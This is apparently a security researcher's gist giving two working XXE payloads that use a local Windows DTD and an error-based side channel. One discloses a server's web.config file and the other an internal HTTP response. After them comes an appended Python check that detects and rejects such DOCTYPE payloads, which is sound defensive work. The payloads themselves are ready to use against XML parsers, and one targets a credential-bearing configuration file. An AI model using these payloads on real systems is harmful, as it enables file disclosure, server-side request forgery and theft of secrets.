@infosec-au
Created February 4, 2021 01:10
Windows Local DTD and Side Channel Leak to disclose HTTP response/file contents

Disclose local file:

<!DOCTYPE doc [
    <!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\cim20.dtd">
    <!ENTITY % SuperClass '>
        <!ENTITY &#x25; file SYSTEM "file://D:\webserv2\services\web.config">
        <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file://t/#&#x25;file;&#x27;>">
        &#x25;eval;
        &#x25;error;
      <!ENTITY test "test"'
    >
    %local_dtd;
  ]><xxx>cacat</xxx>

Disclose HTTP Response:

<!DOCTYPE doc [
    <!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\cim20.dtd">
    <!ENTITY % SuperClass '>
        <!ENTITY &#x25; file SYSTEM "https://erp.company.com">
        <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file://test/#&#x25;file;&#x27;>">
        &#x25;eval;
        &#x25;error;
      <!ENTITY test "test"'
    >
    %local_dtd;
  ]><xxx>cacat</xxx>

Credit for the hash fragment information disclosure trick goes to https://twitter.com/nytr0gen_
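A defender-side pre-parse check for the pattern both payloads above rely on (a DOCTYPE internal subset that declares parameter entities with SYSTEM identifiers and smuggles `%` as `&#x25;` so a nested entity declaration is assembled at parse time). This is example code added here, not part of the gist; the sample input is constructed in the shape of the payloads with a placeholder path, and the check rejects any DOCTYPE rather than only the indicators it names.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample in the shape of the gist's payloads (placeholder path, no real target).
SAMPLE_XXE = """<!DOCTYPE doc [
  <!ENTITY % local_dtd SYSTEM "file:///C:\\Windows\\System32\\wbem\\xml\\cim20.dtd">
  <!ENTITY % SuperClass '>
    <!ENTITY &#x25; file SYSTEM "file://PLACEHOLDER/web.config">
    <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file://t/#&#x25;file;&#x27;>">
    &#x25;eval;
    &#x25;error;
  <!ENTITY test "test"'
  >
  %local_dtd;
]><xxx>cacat</xxx>"""
BENIGN = '<doc><item id="1">ok</item></doc>'

# Pull out the DOCTYPE and its internal subset (the text between "[" and "]>").
DOCTYPE_RE = re.compile(r"<!DOCTYPE\b[^\[>]*(\[(?P<subset>.*?)\]\s*)?>", re.S)

# Hallmarks of the local-DTD / error-based technique, checked inside the subset only.
INDICATORS = {
    "parameter_entity": re.compile(r"<!ENTITY\s+%"),             # <!ENTITY % name ...>
    "external_id": re.compile(r"\b(SYSTEM|PUBLIC)\b"),           # fetches file:// or http(s):// resources
    "escaped_percent": re.compile(r"&#(x25|37);"),               # '%' as a char ref: late parameter-entity decl
    "nested_entity_decl": re.compile(r"&#x26;#x25;|&#38;#37;"),  # '&%' double-escaped: a declaration inside a value
}

def doctype_findings(xml_text: str) -> list[str]:
    """Return [] for DOCTYPE-free input, else 'doctype' plus any indicators seen in the subset."""
    m = DOCTYPE_RE.search(xml_text)
    if not m:
        return []
    subset = m.group("subset") or ""
    return ["doctype"] + [name for name, rx in INDICATORS.items() if rx.search(subset)]

def safe_parse(xml_text: str) -> ET.Element:
    """Refuse any document carrying a DOCTYPE before it reaches a parser; untrusted XML
    almost never needs DTD processing, so rejecting the whole class is simpler than
    reasoning about which declarations a given parser will honour."""
    findings = doctype_findings(xml_text)
    if findings:
        raise ValueError("rejected XML: " + ", ".join(findings))
    return ET.fromstring(xml_text)

if __name__ == "__main__":
    print(doctype_findings(SAMPLE_XXE))
    print(safe_parse(BENIGN).tag)
```

The findings list doubles as a logging payload, so the same function can feed a WAF or application log when a rejected document arrives.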
